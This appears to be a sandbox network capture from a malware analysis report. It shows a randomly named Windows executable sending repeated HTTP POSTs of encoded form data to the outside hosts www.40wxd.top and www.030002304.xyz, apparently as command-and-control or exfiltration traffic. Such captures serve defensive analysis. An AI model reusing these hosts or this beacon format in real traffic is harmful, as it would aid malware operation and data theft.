                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?V0Qh=4pBta8&pP_8=yPYTPsOMRuT7nXzMZEh0cyOx75sbkvhbS623oo+vDaz4p8qW1TPOp1vW0qrZ2oW5wmcFkFH8avXQJuay0KjCNQuKV15vU1edPek8xw4GryuOme+JkwmIlF8="}</script></head></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      49192.168.2.463365206.119.82.134803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:20:23.318247080 CEST754OUTPOST /v4cy/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.40wxd.top
                                                      Origin: http://www.40wxd.top
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.40wxd.top/v4cy/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 56 34 64 37 7a 53 4f 73 6a 4c 55 2f 69 4f 56 6e 59 47 31 38 2b 2b 55 61 66 43 67 38 43 4f 2f 53 71 43 72 75 6e 78 4d 62 7a 2b 6c 38 62 71 4c 2f 45 74 73 4c 48 76 4f 35 64 42 37 35 69 61 53 6e 38 74 48 35 34 67 79 59 56 4b 31 32 76 34 50 78 70 55 64 5a 78 77 6e 59 77 49 58 44 58 4d 44 37 58 34 42 72 68 67 4e 51 46 7a 6f 4e 67 63 4a 67 39 4c 57 73 38 56 75 79 50 73 4c 52 41 35 75 64 43 64 66 72 64 63 36 51 53 73 62 58 77 68 38 6f 4a 58 58 51 49 39 64 48 4b 64 42 79 39 57 6a 69 6f 4e 6c 68 55 4b 74 6d 71 49 50 47 52 69 53 6e 69 30 67 2f 4e 6a 32 2b 41 5a 30 58 4c 4a 4e 6b 44 41 3d 3d
                                                      Data Ascii: pP_8=V4d7zSOsjLU/iOVnYG18++UafCg8CO/SqCrunxMbz+l8bqL/EtsLHvO5dB75iaSn8tH54gyYVK12v4PxpUdZxwnYwIXDXMD7X4BrhgNQFzoNgcJg9LWs8VuyPsLRA5udCdfrdc6QSsbXwh8oJXXQI9dHKdBy9WjioNlhUKtmqIPGRiSni0g/Nj2+AZ0XLJNkDA==
                                                      Sep 11, 2024 11:20:24.193732023 CEST691INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 11 Sep 2024 09:20:24 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      50192.168.2.463366206.119.82.134803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:20:26.277415037 CEST774OUTPOST /v4cy/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.40wxd.top
                                                      Origin: http://www.40wxd.top
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.40wxd.top/v4cy/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 56 34 64 37 7a 53 4f 73 6a 4c 55 2f 69 76 46 6e 65 6e 31 38 76 4f 55 5a 42 53 67 38 4c 75 2f 57 71 43 6e 75 6e 7a 67 4c 7a 49 56 38 65 2f 6e 2f 46 73 73 4c 58 2f 4f 35 46 78 37 6c 2f 71 54 4b 38 74 4b 45 34 69 57 59 56 4b 68 32 76 36 6e 78 70 6a 42 65 78 67 6e 65 73 49 58 42 49 63 44 37 58 34 42 72 68 67 59 4e 46 7a 67 4e 67 4d 5a 67 2f 71 57 76 31 31 75 31 4b 63 4c 52 4c 5a 75 5a 43 64 66 64 64 64 32 32 53 70 66 58 77 67 4d 6f 4a 43 72 66 48 39 64 42 56 74 41 71 39 54 53 46 6d 2b 63 2b 64 36 35 41 6f 6f 2f 4b 55 6b 44 39 7a 46 42 6f 66 6a 53 4e 64 65 39 6a 47 4b 77 74 59 47 67 59 64 49 75 59 52 59 6e 5a 41 72 2f 52 4c 31 63 6a 4c 47 38 3d
                                                      Data Ascii: pP_8=V4d7zSOsjLU/ivFnen18vOUZBSg8Lu/WqCnunzgLzIV8e/n/FssLX/O5Fx7l/qTK8tKE4iWYVKh2v6nxpjBexgnesIXBIcD7X4BrhgYNFzgNgMZg/qWv11u1KcLRLZuZCdfddd22SpfXwgMoJCrfH9dBVtAq9TSFm+c+d65Aoo/KUkD9zFBofjSNde9jGKwtYGgYdIuYRYnZAr/RL1cjLG8=
                                                      Sep 11, 2024 11:20:27.185648918 CEST691INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 11 Sep 2024 09:20:27 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      51192.168.2.463367206.119.82.134803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:20:28.819073915 CEST10856OUTPOST /v4cy/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.40wxd.top
                                                      Origin: http://www.40wxd.top
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.40wxd.top/v4cy/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 56 34 64 37 7a 53 4f 73 6a 4c 55 2f 69 76 46 6e 65 6e 31 38 76 4f 55 5a 42 53 67 38 4c 75 2f 57 71 43 6e 75 6e 7a 67 4c 7a 4c 31 38 43 5a 7a 2f 45 50 45 4c 46 76 4f 35 62 42 37 6d 2f 71 53 49 38 74 43 41 34 69 62 6e 56 4a 5a 32 70 72 48 78 76 53 42 65 69 41 6e 65 6e 6f 58 41 58 4d 43 37 58 38 74 76 68 67 49 4e 46 7a 67 4e 67 4a 56 67 70 72 57 76 33 31 75 79 50 73 4c 4e 41 35 76 45 43 63 37 4e 64 64 69 6d 54 61 6e 58 77 41 63 6f 4b 30 2f 66 4b 39 64 44 57 74 41 35 39 54 57 61 6d 2b 41 79 64 36 4e 36 6f 72 6a 4b 5a 6a 48 72 6a 30 4e 33 4a 69 69 58 42 4f 46 30 48 71 6b 2f 52 47 6f 41 57 62 2b 6e 46 61 33 57 62 36 65 55 52 57 77 62 5a 54 45 35 47 73 68 30 6b 31 51 44 6b 45 4b 47 35 54 61 4d 70 71 76 62 4e 74 43 70 45 4b 35 4a 69 66 62 6a 69 72 61 41 32 4d 4b 79 6c 36 4c 6b 68 51 45 4e 67 46 36 37 69 71 76 34 67 70 4e 4f 48 58 52 57 47 57 7a 53 71 75 50 6d 6b 55 67 69 75 63 62 54 79 67 66 31 43 59 57 5a 4e 74 73 74 6b 6d 4d 52 55 67 37 6c 76 37 67 67 46 73 45 54 5a 73 42 6e 62 6b 38 4e 56 [TRUNCATED]
                                                      Data Ascii: pP_8=V4d7zSOsjLU/ivFnen18vOUZBSg8Lu/WqCnunzgLzL18CZz/EPELFvO5bB7m/qSI8tCA4ibnVJZ2prHxvSBeiAnenoXAXMC7X8tvhgINFzgNgJVgprWv31uyPsLNA5vECc7NddimTanXwAcoK0/fK9dDWtA59TWam+Ayd6N6orjKZjHrj0N3JiiXBOF0Hqk/RGoAWb+nFa3Wb6eURWwbZTE5Gsh0k1QDkEKG5TaMpqvbNtCpEK5JifbjiraA2MKyl6LkhQENgF67iqv4gpNOHXRWGWzSquPmkUgiucbTygf1CYWZNtstkmMRUg7lv7ggFsETZsBnbk8NV6kyFfJiMwghrAMY27VesjVl7/lfy7+GDxV+SqJ0HVw+GIVRMYYqwKfOL3A/Oj/DbL8JOqtPX0r7Ow6Y5PR46s3+Q87F0DSUbCWUibGC2jcrpStrbHmxZVfadlDPAhq+Pr+IAAhkTbP9bXzkvPGVyQsVHxYk0b6gLF1cKCB/37RBstM/Cw9N4xybTd+KEq/LotAKunMkywX+kghKmC3eP/7MfVKwF/wAWz28/8Q3+RYmYsGqKNaLc/wK86oMt2Fr6zjkkhYlTeRsmBhzdBLUH8fJm0CmPxlswfsFvPHh07bC510KOlUu6Y4KB50DHnm94BqhFWJs9YoQ6etLRt2Csxo5uNHAjizJuRcZpNjB3pI/3kma4kvYSRRkOTzYr5DbhUVp8YHhNgif6H5rtSVrgQKgA6jPskq79mSJF3aberXZfu9WvYmmdwmqMBffHfcC5xenA+8ZAJnPKCzqj5cDau981o2E9CNOUtq3d8obQR/T+h63VWnPh/ZfAXyaXjobw3eyq9PI7P96lOjaoT+y4YMouGGniq5fOJWjtDd1S4ccwrjGa5cr1zouODYtQ12Y6xSne581pMJ5bIF2IrnBwpg0EqLstX5GeuJzZldS3tepmWofZvuQa/0WqqTM/U8lYThyG6omZTA/0NYbddNAaVj1/CK4R1eCtXL [TRUNCATED]
                                                      Sep 11, 2024 11:20:29.713053942 CEST691INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 11 Sep 2024 09:20:29 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      52192.168.2.463368206.119.82.134803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:20:31.357500076 CEST496OUTGET /v4cy/?pP_8=Y61bwknhs9hp9ZZcYkoE/rAHAVoATd7g+jLHgGwEyJh/LKrsM6hsQ8y2QWfg6r+Pzdmi8z7VAqFTz6bCx0F+lD/ii+PJJ/2nHI8msyIEMT4A2MQn/4udzH0=&V0Qh=4pBta8 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.40wxd.top
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Sep 11, 2024 11:20:32.262432098 CEST691INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 11 Sep 2024 09:20:32 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 548
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      53192.168.2.46336965.21.196.90803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:20:37.384572029 CEST766OUTPOST /tmpg/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.030002304.xyz
                                                      Origin: http://www.030002304.xyz
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.030002304.xyz/tmpg/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 50 58 6e 61 6c 59 50 54 34 30 49 66 49 72 56 57 59 78 70 57 6d 76 6a 73 6d 72 74 4d 63 74 6f 4b 38 6d 57 78 79 64 74 74 78 6b 2f 6f 39 6a 47 69 4d 6e 62 71 41 48 58 76 56 6e 46 4c 31 46 76 62 54 39 69 45 61 73 76 6c 57 4f 62 52 4e 38 30 79 33 52 42 76 4e 36 48 4f 56 53 68 48 52 65 44 50 46 59 53 6a 7a 48 78 55 34 43 42 61 49 37 48 6a 72 69 2f 33 68 34 78 37 62 45 4b 58 7a 61 75 68 4f 34 34 58 6f 53 47 72 35 4f 35 47 4a 65 74 55 75 30 36 4a 48 61 68 33 39 43 57 44 48 73 49 2b 76 68 74 4f 4e 59 64 39 72 57 59 4a 49 4a 51 6d 7a 6e 51 43 4e 64 62 66 68 6a 32 49 6b 56 72 62 69 41 3d 3d
                                                      Data Ascii: pP_8=PXnalYPT40IfIrVWYxpWmvjsmrtMctoK8mWxydttxk/o9jGiMnbqAHXvVnFL1FvbT9iEasvlWObRN80y3RBvN6HOVShHReDPFYSjzHxU4CBaI7Hjri/3h4x7bEKXzauhO44XoSGr5O5GJetUu06JHah39CWDHsI+vhtONYd9rWYJIJQmznQCNdbfhj2IkVrbiA==
                                                      Sep 11, 2024 11:20:38.047235966 CEST1032INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Wed, 11 Sep 2024 09:20:37 GMT
                                                      vary: User-Agent
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      54192.168.2.46337065.21.196.90803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:20:39.927700043 CEST786OUTPOST /tmpg/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.030002304.xyz
                                                      Origin: http://www.030002304.xyz
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.030002304.xyz/tmpg/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 50 58 6e 61 6c 59 50 54 34 30 49 66 4f 49 4e 57 4c 69 42 57 76 76 6a 72 73 4c 74 4d 56 4e 6f 4f 38 6d 61 78 79 63 70 62 78 32 62 6f 39 43 32 69 65 6d 62 71 48 48 58 76 64 48 46 4f 37 6c 76 51 54 39 65 4d 61 75 37 6c 57 4f 66 52 4e 34 34 79 32 6d 56 67 4d 71 48 4d 5a 79 68 46 56 65 44 50 46 59 53 6a 7a 48 31 79 34 43 5a 61 49 4b 33 6a 73 7a 2f 30 76 59 78 36 4c 6b 4b 58 6c 71 76 6f 4f 34 34 50 6f 51 6a 2b 35 4e 42 47 4a 65 39 55 75 68 57 4b 4f 61 68 31 35 43 57 53 57 63 4a 4d 32 7a 77 39 4e 59 5a 38 79 44 39 30 4e 50 42 38 69 57 78 56 66 64 2f 73 38 6b 2f 38 70 57 57 53 35 4d 33 6f 45 74 4c 45 2f 47 4c 31 64 47 37 32 4a 49 38 77 45 75 59 3d
                                                      Data Ascii: pP_8=PXnalYPT40IfOINWLiBWvvjrsLtMVNoO8maxycpbx2bo9C2iembqHHXvdHFO7lvQT9eMau7lWOfRN44y2mVgMqHMZyhFVeDPFYSjzH1y4CZaIK3jsz/0vYx6LkKXlqvoO44PoQj+5NBGJe9UuhWKOah15CWSWcJM2zw9NYZ8yD90NPB8iWxVfd/s8k/8pWWS5M3oEtLE/GL1dG72JI8wEuY=
                                                      Sep 11, 2024 11:20:40.714804888 CEST1032INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Wed, 11 Sep 2024 09:20:40 GMT
                                                      vary: User-Agent
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
